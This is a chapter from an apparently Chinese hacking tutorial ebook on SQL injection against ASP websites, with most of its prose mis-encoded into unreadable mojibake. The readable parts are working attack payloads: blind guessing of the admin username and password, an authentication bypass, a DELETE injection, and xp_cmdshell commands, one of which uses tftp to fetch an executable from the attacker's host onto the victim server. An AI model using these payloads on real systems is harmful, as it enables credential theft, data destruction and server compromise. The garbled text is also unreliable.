Î÷±Ê¾ÓС˵Íø > ÆäËûС˵µç×ÓÊé > 30Ìì´òÔìרҵºì¿Í >

µÚ18ÕÂ

30Ìì´òÔìרҵºì¿Í-µÚ18ÕÂ

С˵£º 30Ìì´òÔìרҵºì¿Í ×ÖÊý£º ÿҳ3000×Ö

°´¼üÅÌÉÏ·½Ïò¼ü ¡û »ò ¡ú ¿É¿ìËÙÉÏÏ·­Ò³£¬°´¼üÅÌÉ쵀 Enter ¼ü¿É»Øµ½±¾ÊéĿ¼ҳ£¬°´¼üÅÌÉÏ·½Ïò¼ü ¡ü ¿É»Øµ½±¾Ò³¶¥²¿£¡
¡ª¡ª¡ª¡ªÎ´ÔĶÁÍꣿ¼ÓÈëÊéÇ©ÒѱãÏ´μÌÐøÔĶÁ£¡



and¡¡1=£¨select¡¡count£¨*£©¡¡from¡¡admin¡¡where¡¡left£¨user£»2£©=ad£©¡¡
¾ÍÕâÑùÒ»´Î¼ÓÒ»¸ö×Ö·ûÕâÑù²Â£»²Âµ½¹»Äã¸Õ²Å²Â³öÀ´µÄ¶àÉÙλÁ˾ͶÔÁË£»ÕʺžÍËã³öÀ´ÁË¡¡
Æäʵ²Â³öÁËÇ°¼¸¸ö×ÖĸÄã¾Í×Ô¼º¿ÉÒÔÏëÏñÁË£¬Óõ½Éç»á¹¤³ÌѧÁËÓ´~£¬±ÈÈç²Âµ½ÁËad¡¡£¬Äã¾Í¿ÉÒÔ²ÂÁË¡¡
administrator£»or¡¡£»admin£»or¡¡£»adminstra¡£¡£¡£¡£¡£¡£¡£ÕâÑù²ÂµÄЧÂʱȽϸßÓ´£¡¡¡
¹¤×÷»¹Ã»ÓÐÍꣻ±ðæ×ÅÅÜÁË£»»¹ÓÐ10λÃÜÂ룻ºÇºÇ¡¡
and¡¡1=£¨select¡¡count£¨*£©¡¡from¡¡admin¡¡where¡¡left£¨password£»1£©=a£©¡¡
¾­¹ýÎÞÊý´Î´íÎóÖ®ºó£¨Ê×ÏÈ´ó¼ÒµÃÓиö×¼±¸SQL×¢ÈëÓÐʱºò¾ÍÊǺܷ³µÄ£©
htttp£º//host/news/article_view¡£asp£¿id=2499¡¡and¡¡1=£¨select¡¡count£¨*£©¡¡from¡¡admin¡¡where¡¡left£¨password£»10£©=administra£©¡¡
½á¹ûÃÜÂëÊÇadministra¡¡
¾ÍÕâô¼òµ¥£¬ÎÒÖ»ÊǾٸöºÜ¼òµ¥µÄÀý×Ó£¬Ïë´ó¼ÒÓ¦¸Ã»áÁé»îÓ¦Ó㬵±È»ÎÒ»¹»á½²¶àһЩ·½·¨µÄ
¡£½ñÌì¾Íµ½Õ⣬ÒòΪÕâ2ÌìÓеãÊ£¬ËùÒÔ»¹Çë´ó¼Ò¶à¶àÁ½â
¡ºµÚ20Ìì¡»¼ÌÐø˵sql¡¡injection
sql¡¡injectionÒ²¾ÍÊÇ×òÌì˵µÄSQL×¢È루Ҳ¿ÉÒÔÓÐÆäËûµÄ·­Ò룬·´ÕýÎÒϲ»¶ÓÃ×¢ÈëÕâ¸ö´Ê£©
×òÌìÖ»¾ÙÁ˸ö¼òµ¥µÄÀý×Ó£¬½ñÌìÔÛÃÇÀ´ÉîÈëÌÖÂÛÕâ¸ö°É
SQL¡¡injection¿ÉÒÔ˵ÊÇÒ»ÖÖ©¶´£¬Ò²¿ÉÒÔ˵³ÉÊÇÒ»ÖÖ¹¥»÷·½·¨£¬³ÌÐòÖеıäÁ¿´¦Àí²»µ±£¬¶ÔÓû§Ìá½»µÄÊý¾Ý¹ýÂ˲»×㣬¶¼¿ÉÄܲúÉúÕâ¸ö©¶´£¬¶ø¹¥»÷Ô­Àí¾ÍÊÇÀûÓÃÓû§Ìá½»»ò¿ÉÐ޸ĵÄÊý¾Ý£¬°ÑÏëÒªµÄSQLÓï¾ä²åÈ뵽ϵͳʵ¼ÊSQLÓï¾äÖУ¬ÇáÔò»ñµÃÃô¸ÐµÄÐÅÏ¢£¬ÖØÔò¿ØÖÆ·þÎñÆ÷¡£SQL¡¡injection²¢²»½ô½ô¾ÖÏÞÔÚMssqlÊý¾Ý¿âÖУ¬Access¡¢Mysql¡¢Oracle¡¢Sybase¶¼¿ÉÒÔ½øÐÐSQL¡¡injection¹¥»÷¡£¡¡Õâ¸ö×òÌìÓÐÌáµ½µ«²»È«Ãæ½ñÌìÎÒÌصØÔÙ˵һ±é¡£
SQL¡¡injectionʹµÃ¹¥»÷ÕßÄܹ»ÀûÓá¡Web¡¡Ó¦ÓóÌÐòÖÐijЩÊèÓÚ·À·¶µÄÊäÈë»ú»á¶¯Ì¬Éú³ÉÌØÊâµÄ¡¡SQL¡¡Ö¸ÁîÓï¾ä¡£¾ÙÒ»¸ö³£¼ûµÄÀý×Ó£º¡¡
ij¡¡Web¡¡ÍøÕ¾²ÉÓÃ±íµ¥À´ÊÕ¼¯·ÃÎÊÕßµÄÓû§ÃûºÍÃÜÂëÒÔÈ·ÈÏËûÓÐ×㹻ȨÏÞ·ÃÎÊijЩ±£ÃÜÐÅÏ¢£¬È»ºó¸Ã±íµ¥±»·¢Ë͵½¡¡Web¡¡·þÎñÆ÷½øÐд¦Àí¡£½ÓÏÂÀ´£¬·þÎñÆ÷¶ËµÄASP¡¡½Å±¾¸ù¾Ý±íµ¥ÌṩµÄÐÅÏ¢Éú³É¡¡SQL¡¡Ö¸ÁîÓï¾äÌá½»µ½¡¡SQL¡¡·þÎñÆ÷£¬²¢Í¨¹ý·ÖÎö¡¡SQL¡¡·þÎñÆ÷µÄ·µ»Ø½á¹ûÀ´ÅжϸÃÓû§Ãû/ÃÜÂë×éºÏÊÇ·ñÓÐЧ¡£¡¡
ΪÁËʵÏÖÕâÑùµÄ¹¦ÄÜ£¬Web¡¡³ÌÐòÔ±¿ÉÄÜ»áÉè¼ÆÁ½¸öÒ³Ã棺һ¸ö¡¡HTML¡¡Ò³Ãæ¡¡£¨Login¡£htm£©¡¡ÓÃÓڵǼ£¬ÁíÒ»¸öASP¡¡Ò³Ãæ¡¡£¨ExecLogin¡£asp£©¡¡ÓÃÓÚÑéÖ¤Óû§È¨ÏÞ£¨¼´ÏòÊý¾Ý¿â²éѯÓû§Ãû/ÃÜÂë×éºÏÊÇ·ñ´æÔÚ£©¡£¾ßÌå´úÂë¿ÉÄÜÏóÕâÑù£º¡¡
Login¡£htm¡¡£¨HTML¡¡Ò³Ã棩¡¡
´úÂ룺¡¡Username£º¡¡
Password£º¡¡
¡¡¡¡
ExecLogin¡£asp¡¡£¨ASP¡¡Ò³Ã棩¡¡
´úÂ룺¡¡
Õ§Ò»¿´£¬ExecLogin¡£asp¡¡µÄ´úÂëËƺõûÓÐÈκΰ²È«Â©¶´£¬ÒòΪÓû§Èç¹û²»¸ø³öÓÐЧµÄÓû§Ãû/ÃÜÂë×éºÏ¾ÍÎÞ·¨µÇ¼¡£È»¶ø£¬Õâ¶Î´úÂëÆ«Æ«²»°²È«£¬¶øÇÒËüÕýÊÇSQL¡¡Ö¸ÁîÖ²Èëʽ¹¥»÷µÄÀíÏëÄ¿±ê¡£¾ßÌå¶øÑÔ£¬Éè¼ÆÕß°ÑÓû§µÄÊäÈëÖ±½ÓÓÃÓÚ¹¹½¨SQL¡¡Ö¸Á´Ó¶øʹ¹¥»÷ÕßÄܹ»×ÔÐоö¶¨¼´½«±»Ö´Ðеġ¡SQL¡¡Ö¸Áî¡£ÀýÈ磺¹¥»÷Õß¿ÉÄÜ»áÔÚ±íµ¥µÄÓû§Ãû»òÃÜÂëÀ¸ÖÐÊäÈë°üº¬¡°¡¡or¡¡¡±ºÍ¡°=¡±¡¡µÈÌØÊâ×Ö·û¡£ÓÚÊÇ£¬Ìá½»¸øÊý¾Ý¿âµÄ¡¡SQL¡¡Ö¸Áî¾Í¿ÉÄÜÊÇ£º¡¡
´úÂ룺SELECT¡¡*¡¡FROM¡¡tblUsers¡¡WHERE¡¡Username=''¡¡or¡¡''=''¡¡and¡¡Password¡¡=¡¡''¡¡or¡¡''=''¡¡
ÕâÑù£¬SQL¡¡·þÎñÆ÷½«·µ»Ø¡¡tblUsers¡¡±í¸ñÖеÄËùÓмǼ£¬¶ø¡¡ASP¡¡½Å±¾½«»áÒò´Ë¶øÎóÈÏΪ¹¥»÷ÕßµÄÊäÈë·ûºÏ¡¡tblUsers¡¡±í¸ñÖеĵÚÒ»Ìõ¼Ç¼£¬´Ó¶øÔÊÐí¹¥»÷ÕßÒÔ¸ÃÓû§µÄÃûÒåµÇÈëÍøÕ¾¡£¡¡
SQL¡¡Ö¸ÁîÖ²Èëʽ¹¥»÷»¹ÓÐÁíÒ»ÖÖÐÎʽ£¬Ëü·¢ÉúÔÚ¡¡ASP¡¡·þÎñÆ÷¸ù¾Ý¡¡querystring¡¡²ÎÊý¶¯Ì¬Éú³ÉÍøҳʱ¡£ÕâÀïÓÐÒ»¸öÀý×Ó£¬´Ë¡¡ASP¡¡Ò³Ãæ´Ó¡¡URL¡¡ÖÐÌáÈ¡³ö¡¡querystring¡¡²ÎÊýÖеġ¡ID¡¡Öµ£¬È»ºó¸ù¾Ý¡¡ID¡¡Öµ¶¯Ì¬Éú³Éºó¼ÌÒ³Ã棺¡¡
´úÂ룺¡¡
ÔÚÒ»°ãÇé¿öÏ£¬´Ë¡¡ASP¡¡½Å±¾Äܹ»ÏÔʾ¾ßÓÐÌض¨¡¡ID¡¡ÖµµÄÎÄÕµÄÄÚÈÝ£¬¶ø¡¡ID¡¡ÖµÊÇÓÉ¡¡URL¡¡Öеġ¡querystring¡¡²ÎÊýÖ¸¶¨µÄ¡£ÀýÈ磺µ±URLΪ¡¡http£º//¡£example¡£/Article¡£asp£¿ID=1055¡¡Ê±£¬ASP¡¡¾Í»á¸ù¾Ý¡¡ID¡¡Îª¡¡1055¡¡µÄÎÄÕÂÌṩµÄÄÚÈÝÉú³ÉÒ³Ãæ¡£¡¡
ÈçͬǰÊöµÇ¼ҳÃæµÄÀý×ÓÒ»Ñù£¬´Ë¶Î´úÂëÒ²ÏòSQL¡¡Ö¸ÁîÖ²Èëʽ¹¥»÷³¨¿ªÁË´óÃÅ¡£ÓÐЩÓû§£¨±ÈÈçÎÒÃÇ£©¿ÉÄÜ»á°Ñ¡¡querystring¡¡ÖеÄÎÄÕ¡¡ID¡¡ÖµÍµ»»Îª¡°0¡¡or¡¡1=1¡±µÈÄÚÈÝ£¨Ò²¾ÍÊÇ˵£¬°Ñ¡¡URL¡¡»»³É¡¡http£º//¡£example¡£/Article¡£asp£¿ID=0¡¡or¡¡1=1£©¡¡´Ó¶øÓÕʹ¡¡ASP¡¡½Å±¾Éú³É²»°²È«µÄ¡¡SQL¡¡Ö¸ÁîÈ磺¡¡
´úÂ룺SELECT¡¡*¡¡FROM¡¡tblArticles¡¡WHERE¡¡ID=0¡¡or¡¡1=1¡¡
ÓÚÊÇ£¬Êý¾Ý¿â½«»á·µ»ØËùÓÐÎÄÕµÄÄÚÈÝ¡£¡¡
µ±È»ÁË£¬±¾Àý·þÎñÆ÷ËùÊܵĹ¥»÷²»Ò»¶¨»áÒýÆðʲôÑÏÖغó¹û¡£¿ÉÊÇÈç¹ûÎÒÃDZ䱾¼ÓÀ÷£¬±ÈÈçÓÃͬÑùµÄÊֶη¢ËÍ¡¡DELETE¡¡µÈ¡¡SQL¡¡Ö¸Áî¡£ÕâÖ»ÐèÒª¼òµ¥µØÐÞ¸ÄÇ°Êö¡¡URL¡¡Öеġ¡querystring¡¡²ÎÊý¾Í¿ÉÒÔÁË£¡ÀýÈ磺ÈκÎÈ˶¼¿ÉÒÔͨ¹ý¡¡¡°http£º//¡£example¡£/Article¡£asp£¿ID=1055£»¡¡DELETE¡¡FROM¡¡tblArticles¡¡¡±¡¡Ö®ÀàµÄ¡¡URL¡¡À´·ÃÎÊ¡¡Web¡¡ÍøÕ¾¡£¡¡
µ«³ÌÐò±Ï¾¹ÊǸ÷ÖÖ¸÷ÑùµÄ£¬ÓÐЩ¿ÉÒÔͨ¹ýÐÞ¸ÄURLÊý¾ÝÀ´Ìá½»ÃüÁî»òÓï¾ä£¬ÓÐЩÔò²»ÐУ¬²»ÄÜ´òURLµÄÖ÷Ò⣬Ôõô°ìÄØ£¿Í¨¹ýÐ޸ıêÇ©ÄÚµÄvalueµÄÖµÒ²¿ÉÒÔÌá½»ÎÒÃǹ¹ÔìµÄÓï¾ä£¬SQL¡¡injectionÊǺÜÁé»îµÄ¼¼Êõ£¬µ«ÎÒÃǵÄÄ¿µÄÖ»ÓÐÒ»¸ö£¬¾ÍÊÇÏë·½Éè·¨ÈĹý³ÌÐò»òIDSµÄ¼ì²âºÍ´¦ÀíÌá½»ÎÒÃǹ¹ÔìµÄÓÐЧÓï¾ä¡£¡¡
ÔÚ´ó¶àÊýASPÕ¾µãÖУ¬ÎÒÃDz¢²»ÖªµÀÆä³ÌÐò´úÂ룬*ÈκÎɨÃèÆ÷Ò²²»¿ÉÄÜ·¢ÏÖSQL¡¡injection©¶´£¬Õâʱ¾ÍÒª*ÊÖ¹¤¼ì²âÁË£¬ÓÉÓÚÎÒÃÇÖ´ÐÐSQLÓï¾äÒªÓõ½µ¥ÒýºÅ¡¢·ÖºÅ¡¢¶ººÅ¡¢Ã°ºÅºÍ¡°¡­¡­¡±£¬ËùÒÔÎÒÃǾÍÔÚ¿ÉÐ޸ĵÄURLºó¼ÓÉÏÒÔÉÏ·ûºÅ£¬»òÔÚ±íµ¥ÖеÄÎı¾¿ò¼ÓÉÏÕâЩ·ûºÅ£¬±ÈÈ磺¡¡
´úÂ룺¡¡
http£º//localhost/show¡£asp£¿id=1'¡¡
http£º//localhost/show¡£asp£¿id=1£»¡¡
¡­¡­
ͨ¹ýÒ³Ãæ·µ»ØµÄÐÅÏ¢£¬ÅжÏÊÇ·ñ´æÔÚSQL¡¡injection©¶´£¬Ö»ÊÇ×î¼òµ¥µÄͨ¹ý×Ö·û¹ýÂËÀ´Åжϣ¬¸ù¾ÝIISÅäÖò»Í¬£¬·µ»ØµÄÐÅÏ¢ÊDz»¶¨µÄ£¬ÓÐʱÏÔʾ
Microsoft¡¡OLE¡¡DB¡¡Provider¡¡for¡¡ODBC¡¡Drivers¡¡´íÎó¡¡'80040e21'¡¡
ODBC¡¡Çý¶¯³ÌÐò²»Ö§³ÖËùÐèµÄÊôÐÔ¡£¡¡
/register/lostpass2¡£asp£¬ÐÐ15
ÓÐʱ¿ÉÄÜ»áÏÔʾ¡°HTTP¡¡500¡¡¡­¡¡ÄÚ²¿·þÎñÆ÷´íÎó¡±£¬Ò²¿ÉÄÜÏÔʾԭÀ´µÄÒ³Ã棬Ҳ¾ÍÊÇÒ³ÃæÕý³£ÏÔʾ£¬¸ü¿ÉÄÜÌáʾ¡°HTTP¡¡404¡¡¨C¡¡ÕÒ²»µ½¸ÃÒ³¡±£¬ÅжÏÊÇ·ñÓЩ¶´¾ÍÒªÓиö×î»ù±¾µÄ¸ù¾Ý¡ª¡ª¾­Ñ飬Õâ¸ö¾Í*´ó¼Ò×Ô¼ºÈ¥ÁìÎòÁË¡£
Èç¹ûÄÜÄõ½Ô´´úÂë¾Í¸üºÃÁË£¬¿ÉÒÔͨ¹ý·ÖÎöÔ´´úÂëÀ´·¢ÏÖASPÎļþµÄÎÊÌ⣬²»¹ýÕâÒªÇóÓнϸߵıà³Ì¹¦µ×£¬×î½üPsKey¾Í·¢ÏÖÁ˲»ÉÙ³ÌÐò´æÔÚSQL¡¡injection©¶´¡£×î½üÔ½·¢µÄ¿ªÊ¼³ç°ÝPSkeyÁË
Ìá½»Êý¾Ý
ÎÒÃÇÅжϳöÒ»¸öASP³ÌÐò´æÔÚSQL¡¡injection©¶´ÒÔºó¾ÍÒª¹¹ÔìÎÒÃǵÄÓï¾äÀ´¶Ô·þÎñÆ÷½øÐвÙ×÷ÁË£¬Ò»°ãÎÒÃǵÄÄ¿µÄÊÇ¿ØÖÆSQL·þÎñÆ÷²éÔÄÐÅÏ¢ÉõÖÁ²Ù×÷ϵͳ¡£ËùÒÔÎÒÃÇÒªÓõ½xp_cmdshellÕâ¸öÀ©Õ¹´æ´¢¹ý³Ì£¬xp_cmdshellÊÇÒ»¸ö·Ç³£ÓÐÓõÄÀ©Õ¹´æ´¢¹ý³Ì£¬ÓÃÓÚÖ´ÐÐϵͳÃüÁ±ÈÈçdir£¬ÎÒÃÇ¿ÉÒÔ¸ù¾Ý³ÌÐòµÄ²»Í¬£¬Ìá½»²»Í¬µÄÓï¾ä£¬ÏÂÀýÓï¾ä½ö½öÊǸö²Î¿¼£¬¸æËß´ó¼ÒÕâ¸öÔ­Àí£¬Êµ¼ÊÇé¿öÊÓ³ÌÐò¶ø¶¨£¬ÕÕ°á²»Ò»¶¨³É¹¦£¬ÏÂͬ¡£¡¡
´úÂ룺¡¡
http£º//localhost/show¡£asp£¿id=1£»¡¡exec¡¡master¡£dbo¡£xp_cmdshell¡¡'dir'£»¡­¡­¡¡
http£º//localhost/show¡£asp£¿id=1'£»¡¡exec¡¡master¡£¡£xp_cmdshell¡¡'dir'¡­¡­
ÕýÈçÇ°ÃæËù˵£¬Ìá½»ÕâÑùµÄÐÅÏ¢ä¯ÀÀÆ÷»á·µ»Ø³ö´íÐÅÏ¢»ò500´íÎó£¬ÎÒÃÇÔõô²ÅÄÜÖªµÀÖ´ÐÐÊÇ·ñ³É¹¦ÄØ£¿isnoµÄ°ì·¨ÊÇÓÃnc¼àÌý±¾»ú¶Ë¿Ú£¬È»ºóÌá½»nslookupÃüÁîÀ´²éѯ£¬ÎÒ¸öÈ˾õµÃÓÐЩÂé·³£¬Ö±½ÓÓÃtftpÀ´ÓжàÖֺô¦£¬ÄÜÖªµÀÃüÁîÊÇ·ñ³É¹¦Ö´ÐУ»ÄÜ»ñµÃSQL·þÎñÆ÷µÄIP´Ó¶øÅжÏSQL·þÎñÆ÷µÄλÖã»»¹ÄܽÚʡһЩ²½ÖèÖ±½ÓÉÏ´«Îļþµ½SQL·þÎñÆ÷¡£ÀûÓÃxp_cmdshellÀ©Õ¹´æ´¢¹ý³ÌÖ´ÐÐtftpÃüÁÔÚÍæunicode©¶´µÄʱºò´ó¼Ò¾Í¯»ð´¿ÇàÁË°É£¿ÁÐÈ磺
´úÂ룺¡¡
http£º//localhost/show¡£asp£¿id=1£»¡¡exec¡¡master¡£dbo¡£xp_cmdshell¡¡'tftp¡¡¨Ci¡¡youip¡¡get¡¡file¡£exe'£»¡­¡­¡¡
http£º//localhost/show¡£asp£¿id=1'£»¡¡exec¡¡master¡£¡£xp_cmdshell¡¡'tftp¡¡¨Ci¡¡youip¡¡get¡¡file¡£exe'¡­¡­
ÓÐʱÌá½»µÄÊý¾Ý²¢²»Ò»¶¨Æð×÷Ó㬿´ÄãÔõôÈƹý³ÌÐòµÄ¼ì²âÁË£¬Èç¹ûÐÒÔ˳ɹ¦µÄ»°£¬¿ÉÒÔ¿´µ½tftpÈí¼þµÄ´°¿Ú³öÏÖ´Ó±¾»úÏÂÔØÎļþµÄÐÅÏ¢ÁË¡£¡¡
¡¡¡¡¶Ô»°¿òÖеÄIPµØÖ·¾ÍÊÇSQL·þÎñÆ÷µÄIP£¬¿ÉÒÔ¸ù¾ÝÕâ¸öIPÅжÏSQL·þÎñÆ÷´¦ÓÚʲôλÖ㬺Íweb·þÎñÆ÷Ò»Æð£¬ÔÚ¾ÖÓòÍøÄÚ£¬»¹Êǵ¥¶ÀµÄ·þÎñÆ÷£¬¾Í×Ô¼ºÅжÏÁË£¬´Ë֪ʶµã²»ÔÚ±¾ÎÄÌÖÂÛ·¶Î§ÄÚ£¬¾Í´ËÂÔ¹ý¡£ÃüÁîÖ´Ðгɹ¦ÒԺ󣬾ͿÉÒÔÌæ»»µ¥ÒýºÅÖеÄÄÚÈÝ£¬Ìí¼

·µ»ØĿ¼ ÉÏÒ»Ò³ ÏÂÒ»Ò³ »Øµ½¶¥²¿ ÔÞ£¨0£© ²È£¨0£©

Äã¿ÉÄÜϲ»¶µÄ